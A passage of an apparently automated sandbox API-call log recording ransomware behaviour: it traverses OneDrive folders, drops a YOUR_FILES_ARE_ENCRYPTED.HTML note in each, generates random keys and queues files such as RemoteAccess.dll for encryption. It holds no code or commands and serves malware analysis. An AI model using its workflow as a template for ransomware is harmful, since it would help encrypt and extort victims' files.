hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x141bf6d6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x141bf6d6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1489a4b4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x17ec0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.695] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0112.695] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\qut-latn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0112.695] GetProcessHeap () returned 0x600000 [0112.695] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.695] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\qut-latn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\qut-latn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.695] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.696] CloseHandle (hObject=0x328) returned 1 [0112.696] GetProcessHeap () returned 0x600000 [0112.696] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.696] GetProcessHeap () returned 0x600000 [0112.696] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.697] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14933008, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x14933008, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x14933008, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="quz-pe", cAlternateFileName="")) returned 1 [0112.697] StrStrIW (lpFirst="quz-pe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.697] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\quz-pe") returned 82 [0112.697] GetProcessHeap () returned 0x600000 [0112.697] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.697] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\quz-pe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\quz-pe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\quz-pe" [0112.697] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\quz-pe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\quz-pe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\quz-pe\\*" [0112.697] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\quz-pe\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14933008, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x14933008, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x14b24ea6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.697] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14933008, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x14933008, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x14b24ea6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="..", cAlternateFileName="")) returned 1 [0112.698] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14b24ea6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x14b24ea6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x16a608f5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x168c0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.698] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.698] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\quz-pe\\FileSync.LocalizedResources.dll.mui") returned 118 [0112.698] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.698] lstrlenW (lpString=".mui") returned 4 [0112.698] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.698] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14b24ea6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x14b24ea6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x16a608f5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x168c0, dwReserved0=0x19e010, dwReserved1=0xfc164569, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.698] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0112.698] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\quz-pe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0112.698] GetProcessHeap () returned 0x600000 [0112.698] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\quz-pe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\quz-pe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.698] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.699] CloseHandle (hObject=0x328) returned 1 [0112.699] GetProcessHeap () returned 0x600000 [0112.699] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.700] GetProcessHeap () returned 0x600000 [0112.700] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.700] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1018a7a5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1018a7a5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1149d5d9, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0xa0ec0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="RemoteAccess.dll", cAlternateFileName="REMOTE~1.DLL")) returned 1 [0112.700] StrStrIW (lpFirst="RemoteAccess.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.700] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\RemoteAccess.dll") returned 92 [0112.700] PathFindExtensionW (pszPath="RemoteAccess.dll") returned=".dll" [0112.700] lstrlenW (lpString=".dll") returned 4 [0112.700] PathFindExtensionW (pszPath="RemoteAccess.dll") returned=".dll" [0112.700] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\RemoteAccess.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\remoteaccess.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0112.700] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=659136) returned 1 [0112.701] GetProcessHeap () returned 0x600000 [0112.701] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0112.702] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="A9") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="26") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="FD") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="A2") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="F4") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="B3") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="B5") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="09") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="FA") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="B5") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="01") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="6F") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="3D") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="84") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="90") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="D7") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="A3") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="3F") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="98") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="AB") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="BC") returned 2 [0112.702] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="F9") returned 2 [0112.702] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="4D") returned 2 [0112.702] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="7F") returned 2 [0112.703] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="98") returned 2 [0112.703] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="C6") returned 2 [0112.703] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="44") returned 2 [0112.703] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="30") returned 2 [0112.703] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="C2") returned 2 [0112.703] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="A0") returned 2 [0112.703] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="3E") returned 2 [0112.703] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="75") returned 2 [0112.703] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\RemoteAccess.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\RemoteAccess.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\RemoteAccess.dll" [0112.703] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.703] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0112.703] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16b45b0a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x16b45b0a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x16b45b0a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ro", cAlternateFileName="")) returned 1 [0112.703] StrStrIW (lpFirst="ro", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.703] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ro") returned 78 [0112.703] GetProcessHeap () returned 0x600000 [0112.703] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0112.705] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ro" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ro") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ro" [0112.705] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ro", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ro\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ro\\*" [0112.705] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ro\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16b45b0a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x16b45b0a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x170a2d96, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xffeedaaf, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.706] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16b45b0a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x16b45b0a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x170a2d96, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xffeedaaf, cFileName="..", cAlternateFileName="")) returned 1 [0112.706] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x170a2d96, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x170a2d96, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x17292a39, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xffeedaaf, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.706] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.706] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ro\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.706] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.706] lstrlenW (lpString=".mui") returned 4 [0112.706] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.706] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x170a2d96, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x170a2d96, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x17292a39, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xffeedaaf, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.706] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0112.706] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ro\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.706] GetProcessHeap () returned 0x600000 [0112.706] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ro\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\ro\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.707] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.708] CloseHandle (hObject=0x330) returned 1 [0112.708] GetProcessHeap () returned 0x600000 [0112.708] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.708] GetProcessHeap () returned 0x600000 [0112.708] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.709] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x172deef5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x172deef5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x172deef5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ru", cAlternateFileName="")) returned 1 [0112.709] StrStrIW (lpFirst="ru", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.709] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ru") returned 78 [0112.709] GetProcessHeap () returned 0x600000 [0112.709] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0112.710] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ru" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ru") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ru" [0112.710] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ru", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ru\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ru\\*" [0112.711] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ru\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x172deef5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x172deef5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x174cef11, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xffeedaaf, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.736] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x172deef5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x172deef5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x174cef11, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xffeedaaf, cFileName="..", cAlternateFileName="")) returned 1 [0112.736] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x174cef11, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x174cef11, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x17ac4b94, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xffeedaaf, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.736] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.736] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ru\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.736] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.737] lstrlenW (lpString=".mui") returned 4 [0112.737] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.737] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x174cef11, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x174cef11, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x17ac4b94, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xffeedaaf, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.737] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0112.737] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ru\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.737] GetProcessHeap () returned 0x600000 [0112.737] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.737] CreateFileW 